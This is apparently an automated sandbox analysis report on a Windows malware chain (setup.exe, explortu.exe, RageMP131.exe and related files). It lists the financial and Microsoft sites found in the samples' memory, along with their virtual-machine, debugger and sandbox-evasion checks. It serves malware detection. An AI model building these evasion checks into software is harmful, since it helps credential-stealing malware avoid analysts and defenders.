Source: MPGPH131.exe, 0000000F.00000003.3215443707.0000000001105000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.2962983581.0000000001105000.00000004.00000020.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.2999593925.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.3193517047.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2937006129.0000000001953000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000014.00000003.2936849762.000000000194A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000002.6959010221.00000000014AB000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.3083983177.00000000014D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: eaa97795e9.exe, 00000018.00000003.2531675780.0000000001876000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000000F.00000003.3215443707.0000000001105000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000003.2962983581.0000000001105000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnFv
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 8bcaec3fef.exe, 00000009.00000002.2572103242.000000000A8B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\6
Source: RageMP131.exe, 0000001B.00000002.6959624442.0000000001551000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\*7
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RageMP131.exe, 0000001B.00000002.6959010221.0000000001440000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&fL5p.
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: setup.exe, setup.exe, 00000000.00000002.2077796101.000000000035C000.00000040.00000001.01000000.00000003.sdmp, explortu.exe, explortu.exe, 00000003.00000002.2116153169.000000000076C000.00000040.00000001.01000000.00000007.sdmp, b6042db502.exe, b6042db502.exe, 00000005.00000002.2220720292.0000000000E2D000.00000040.00000001.01000000.00000009.sdmp, 8bcaec3fef.exe, 8bcaec3fef.exe, 00000009.00000002.2560316369.00000000006A3000.00000040.00000001.01000000.0000000D.sdmp, RageMP131.exe, RageMP131.exe, 0000001B.00000002.6958219757.0000000001098000.00000040.00000001.01000000.00000011.sdmp, axplong.exe, 0000001C.00000002.2715569843.00000000002CD000.00000040.00000001.01000000.0000000B.sdmp, explortu.exe, 0000001D.00000002.2715567444.000000000076C000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}cal\Temp\spanft9jhuGxTSc7\3b6N2Xdh3CYwplaces.sqliteg
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001B.00000003.3083983177.00000000014D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWW
Source: 8bcaec3fef.exe, 00000009.00000002.2572103242.000000000A8B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RageMP131.exe, 00000014.00000003.2936849762.000000000194A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW\
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: MPGPH131.exe, 0000000F.00000003.2333342231.00000000010D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6b
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RageMP131.exe, 0000001B.00000002.6962796598.0000000007F2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_609DC3E4
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4Ac7akovb2igD0VM4R9JPvXiuLp1lUclMTbWXdy79t5JAAAAAGYRT3E1I6pNw6cCRvvAqwCaa3EfLpJFvczcTwSaoFb144oCyy66IEHm4hQ8c9+NCAP4mcA/3EVEMP45VIPNP+w==
Source: eaa97795e9.exe, 00000013.00000003.2999593925.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, eaa97795e9.exe, 00000013.00000003.3193517047.00000000005F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: RageMP131.exe, 0000001B.00000002.6962796598.0000000007F2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_609DC3E4hd990
Source: setup.exe, 00000000.00000002.2077796101.000000000035C000.00000040.00000001.01000000.00000003.sdmp, explortu.exe, 00000003.00000002.2116153169.000000000076C000.00000040.00000001.01000000.00000007.sdmp, b6042db502.exe, 00000005.00000002.2220720292.0000000000E2D000.00000040.00000001.01000000.00000009.sdmp, 8bcaec3fef.exe, 00000009.00000002.2560316369.00000000006A3000.00000040.00000001.01000000.0000000D.sdmp, RageMP131.exe, 0000001B.00000002.6958219757.0000000001098000.00000040.00000001.01000000.00000011.sdmp, axplong.exe, 0000001C.00000002.2715569843.00000000002CD000.00000040.00000001.01000000.0000000B.sdmp, explortu.exe, 0000001D.00000002.2715567444.000000000076C000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Users\user\Desktop\setup.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\setup.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161721 Start: 0A161D76 End: 0A161727 9_2_0A161721
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_04D00CA5 rdtsc 0_2_04D00CA5
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_00424CE8 mov eax, dword ptr fs:[00000030h] 9_2_00424CE8
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161810 mov eax, dword ptr fs:[00000030h] 9_2_0A161810
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161604 mov eax, dword ptr fs:[00000030h] 9_2_0A161604
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161A00 mov eax, dword ptr fs:[00000030h] 9_2_0A161A00
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161801 mov eax, dword ptr fs:[00000030h] 9_2_0A161801
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A160A0A mov eax, dword ptr fs:[00000030h] 9_2_0A160A0A
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A160834 mov eax, dword ptr fs:[00000030h] 9_2_0A160834
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161633 mov eax, dword ptr fs:[00000030h] 9_2_0A161633
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161431 mov eax, dword ptr fs:[00000030h] 9_2_0A161431
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16123D mov eax, dword ptr fs:[00000030h] 9_2_0A16123D
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16123A mov eax, dword ptr fs:[00000030h] 9_2_0A16123A
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161A3A mov eax, dword ptr fs:[00000030h] 9_2_0A161A3A
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161823 mov eax, dword ptr fs:[00000030h] 9_2_0A161823
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161A2B mov eax, dword ptr fs:[00000030h] 9_2_0A161A2B
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16165F mov eax, dword ptr fs:[00000030h] 9_2_0A16165F
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16185A mov eax, dword ptr fs:[00000030h] 9_2_0A16185A
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A160A43 mov eax, dword ptr fs:[00000030h] 9_2_0A160A43
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16124F mov eax, dword ptr fs:[00000030h] 9_2_0A16124F
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16144F mov eax, dword ptr fs:[00000030h] 9_2_0A16144F
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16164C mov eax, dword ptr fs:[00000030h] 9_2_0A16164C
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161675 mov eax, dword ptr fs:[00000030h] 9_2_0A161675
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161471 mov eax, dword ptr fs:[00000030h] 9_2_0A161471
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16187E mov eax, dword ptr fs:[00000030h] 9_2_0A16187E
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A160A64 mov eax, dword ptr fs:[00000030h] 9_2_0A160A64
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161263 mov eax, dword ptr fs:[00000030h] 9_2_0A161263
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A160860 mov eax, dword ptr fs:[00000030h] 9_2_0A160860
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16086D mov eax, dword ptr fs:[00000030h] 9_2_0A16086D
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161869 mov eax, dword ptr fs:[00000030h] 9_2_0A161869
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161A69 mov eax, dword ptr fs:[00000030h] 9_2_0A161A69
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161681 mov eax, dword ptr fs:[00000030h] 9_2_0A161681
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16088D mov eax, dword ptr fs:[00000030h] 9_2_0A16088D
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16148A mov eax, dword ptr fs:[00000030h] 9_2_0A16148A
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A160A88 mov eax, dword ptr fs:[00000030h] 9_2_0A160A88
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1608B2 mov eax, dword ptr fs:[00000030h] 9_2_0A1608B2
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1614B2 mov eax, dword ptr fs:[00000030h] 9_2_0A1614B2
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1616BF mov eax, dword ptr fs:[00000030h] 9_2_0A1616BF
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1616A2 mov eax, dword ptr fs:[00000030h] 9_2_0A1616A2
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A160AA1 mov eax, dword ptr fs:[00000030h] 9_2_0A160AA1
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1612AD mov eax, dword ptr fs:[00000030h] 9_2_0A1612AD
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1618A8 mov eax, dword ptr fs:[00000030h] 9_2_0A1618A8
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1614D6 mov eax, dword ptr fs:[00000030h] 9_2_0A1614D6
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1616D4 mov eax, dword ptr fs:[00000030h] 9_2_0A1616D4
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1608DC mov eax, dword ptr fs:[00000030h] 9_2_0A1608DC
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1614C0 mov eax, dword ptr fs:[00000030h] 9_2_0A1614C0
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A160ACF mov eax, dword ptr fs:[00000030h] 9_2_0A160ACF
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1608CD mov eax, dword ptr fs:[00000030h] 9_2_0A1608CD
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1612FE mov eax, dword ptr fs:[00000030h] 9_2_0A1612FE
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1608FD mov eax, dword ptr fs:[00000030h] 9_2_0A1608FD
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1618E6 mov eax, dword ptr fs:[00000030h] 9_2_0A1618E6
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1612E0 mov eax, dword ptr fs:[00000030h] 9_2_0A1612E0
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1614EC mov eax, dword ptr fs:[00000030h] 9_2_0A1614EC
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1616E8 mov eax, dword ptr fs:[00000030h] 9_2_0A1616E8
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16071F mov eax, dword ptr fs:[00000030h] 9_2_0A16071F
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16091A mov eax, dword ptr fs:[00000030h] 9_2_0A16091A
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16191A mov eax, dword ptr fs:[00000030h] 9_2_0A16191A
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A160B07 mov eax, dword ptr fs:[00000030h] 9_2_0A160B07
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161900 mov eax, dword ptr fs:[00000030h] 9_2_0A161900
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16150C mov eax, dword ptr fs:[00000030h] 9_2_0A16150C
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161934 mov eax, dword ptr fs:[00000030h] 9_2_0A161934
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161333 mov eax, dword ptr fs:[00000030h] 9_2_0A161333
